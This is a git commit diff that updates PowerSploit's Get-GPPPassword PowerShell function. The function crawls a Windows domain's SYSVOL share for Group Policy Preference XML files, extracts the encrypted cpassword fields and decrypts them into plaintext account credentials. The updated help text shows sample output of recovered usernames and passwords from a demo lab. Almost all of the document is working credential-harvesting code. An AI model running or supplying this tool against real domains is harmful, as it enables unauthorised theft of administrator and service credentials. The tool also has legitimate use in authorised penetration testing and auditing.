Merge branch 'master' of https://github.com/mattifestation/PowerSploit

Conflicts:
	Recon/Get-ComputerDetails.ps1
	Recon/Recon.psd1

1 files changed, 148 insertions, 61 deletions

diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1
index 7dbd23d..ea87de4 100644
--- a/Exfiltration/Get-GPPPassword.ps1
+++ b/Exfiltration/Get-GPPPassword.ps1
@@ -1,4 +1,4 @@
-function Get-GPPPassword {
+function Get-GPPPassword {
 <#
 .SYNOPSIS
 
@@ -9,6 +9,7 @@
     License: BSD 3-Clause
     Required Dependencies: None
     Optional Dependencies: None
+    Version: 2.4.2
  
 .DESCRIPTION
 
@@ -16,7 +17,43 @@
 
 .EXAMPLE
 
-    Get-GPPPassword
+    PS C:\> Get-GPPPassword
+    
+    NewName   : [BLANK]
+    Changed   : {2014-02-21 05:28:53}
+    Passwords : {password12}
+    UserNames : {test1}
+    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
+
+    NewName   : {mspresenters}
+    Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
+    Passwords : {Recycling*3ftw!, password123, password1234}
+    UserNames : {Administrator (built-in), DummyAccount, dummy2}
+    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
+
+    NewName   : [BLANK]
+    Changed   : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
+    Passwords : {password, password1234$}
+    UserNames : {administrator, admin}
+    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
+
+    NewName   : [BLANK]
+    Changed   : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
+    Passwords : {password, read123}
+    UserNames : {DEMO\Administrator, admin}
+    File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
+
+.EXAMPLE
+
+    PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
+    
+    password
+    password12
+    password123
+    password1234
+    password1234$
+    read123
+    Recycling*3ftw!
 
 .LINK
     
@@ -29,8 +66,12 @@
     [CmdletBinding()]
     Param ()
     
+    #Some XML issues between versions
+    Set-StrictMode -Version 2
+    
     #define helper function that decodes and decrypts password
     function Get-DecryptedCpassword {
+        [CmdletBinding()]
         Param (
             [string] $Cpassword 
         )
@@ -38,7 +79,12 @@
         try {
             #Append appropriate padding based on string length  
             $Mod = ($Cpassword.length % 4)
-            if ($Mod -ne 0) {$Cpassword += ('=' * (4 - $Mod))}
+            
+            switch ($Mod) {
+            '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
+            '2' {$Cpassword += ('=' * (4 - $Mod))}
+            '3' {$Cpassword += ('=' * (4 - $Mod))}
+            }
 
             $Base64Decoded = [Convert]::FromBase64String($Cpassword)
             
@@ -60,78 +106,119 @@
         catch {Write-Error $Error[0]}
     }  
     
-    #ensure that machine is domain joined and script is running as a domain account
-    if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) )
-    {
-        throw 'Machine is not joined to a domain.'
-    }
-    
-    #discover potential files containing passwords ; not complaining in case of denied access to a directory
-    $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml'
+    #define helper function to parse fields from xml files
+    function Get-GPPInnerFields {
+    [CmdletBinding()]
+        Param (
+            $File 
+        )
     
-    if ( -not $XMlFiles )
-    {
-        throw 'No files containing encrypted passwords found.'
-    }
-
-    foreach ($File in $XMLFiles) {
-        
         try {
-            $Filename = $File.Name
-            $Filepath = $File.VersionInfo.FileName
-
-            #put filename in $XmlFile
+            
+            $Filename = Split-Path $File -Leaf
             [xml] $Xml = Get-Content ($File)
 
-            #declare blank variables
-            $Cpassword = ''
-            $UserName = ''
-            $NewName = ''
-            $Changed = ''
+            #declare empty arrays
+            $Cpassword = @()
+            $UserName = @()
+            $NewName = @()
+            $Changed = @()
+            $Password = @()
     
-            switch ($Filename) {
+            #check for password field
+            if ($Xml.innerxml -like "*cpassword*"){
+            
+                Write-Verbose "Potential password in $File"
+                
+                switch ($Filename) {
 
-                'Groups.xml' {
-                    $Cpassword = $Xml.Groups.User.Properties.cpassword
-                    $UserName = $Xml.Groups.User.Properties.userName
-                    $NewName = $Xml.Groups.User.Properties.newName
-                    $Changed = $Xml.Groups.User.changed
-                }
+                    'Groups.xml' {
+                        $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                    }
         
-                'Services.xml' {
-                    $Cpassword = $Xml.NTServices.NTService.Properties.cpassword
-                    $UserName = $Xml.NTServices.NTService.Properties.accountName
-                    $Changed = $Xml.NTServices.NTService.changed
-                }
+                    'Services.xml' {  
+                        $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                    }
         
-                'Scheduledtasks.xml' {
-                    $Cpassword = $Xml.ScheduledTasks.Task.Properties.cpassword
-                    $UserName = $Xml.ScheduledTasks.Task.Properties.runAs
-                    $Changed = $Xml.ScheduledTasks.Task.changed
-                }
+                    'Scheduledtasks.xml' {
+                        $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                    }
         
-                'DataSources.xml' {
-                    $Cpassword = $Xml.DataSources.DataSource.Properties.cpassword
-                    $UserName = $Xml.DataSources.DataSource.Properties.username
-                    $Changed = $Xml.DataSources.DataSource.changed
+                    'DataSources.xml' { 
+                        $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}                          
+                    }
+                    
+                    'Printers.xml' { 
+                        $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                    }
+  
+                    'Drives.xml' { 
+                        $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} 
+                    }
                 }
-            }
-
-            if ($Cpassword) {$Password = Get-DecryptedCpassword $Cpassword}
-
-            else {Write-Verbose "No encrypted passwords found in $Filepath"}
-        
+           }
+                     
+           foreach ($Pass in $Cpassword) {
+               Write-Verbose "Decrypting $Pass"
+               $DecryptedPassword = Get-DecryptedCpassword $Pass
+               Write-Verbose "Decrypted a password of $DecryptedPassword"
+               #append any new passwords to array
+               $Password += , $DecryptedPassword
+           }
+            
+            #put [BLANK] in variables
+            if (!($Password)) {$Password = '[BLANK]'}
+            if (!($UserName)) {$UserName = '[BLANK]'}
+            if (!($Changed)) {$Changed = '[BLANK]'}
+            if (!($NewName)) {$NewName = '[BLANK]'}
+                  
             #Create custom object to output results
-            $ObjectProperties = @{'Password' = $Password;
-                                  'UserName' = $UserName;
+            $ObjectProperties = @{'Passwords' = $Password;
+                                  'UserNames' = $UserName;
                                   'Changed' = $Changed;
-                                  'NewName' = $NewName
-                                  'File' = $Filepath}
+                                  'NewName' = $NewName;
+                                  'File' = $File}
                 
             $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
-            Write-Output $ResultsObject
+            Write-Verbose "The password is between {} and may be more than one value."
+            if ($ResultsObject) {Return $ResultsObject} 
+        }
+
+        catch {Write-Error $Error[0]}
+    }
+    
+    try {
+        #ensure that machine is domain joined and script is running as a domain account
+        if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
+            throw 'Machine is not a domain member or User is not a member of the domain.'
+        }
+    
+        #discover potential files containing passwords ; not complaining in case of denied access to a directory
+        Write-Verbose 'Searching the DC. This could take a while.'
+        $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
+    
+        if ( -not $XMlFiles ) {throw 'No preference files found.'}
+
+        Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
+    
+        foreach ($File in $XMLFiles) {
+            $Result = (Get-GppInnerFields $File.Fullname)
+            Write-Output $Result
         }
-        
-        catch {Write-Error $Error[0]}  
     }
+
+    catch {Write-Error $Error[0]}
 }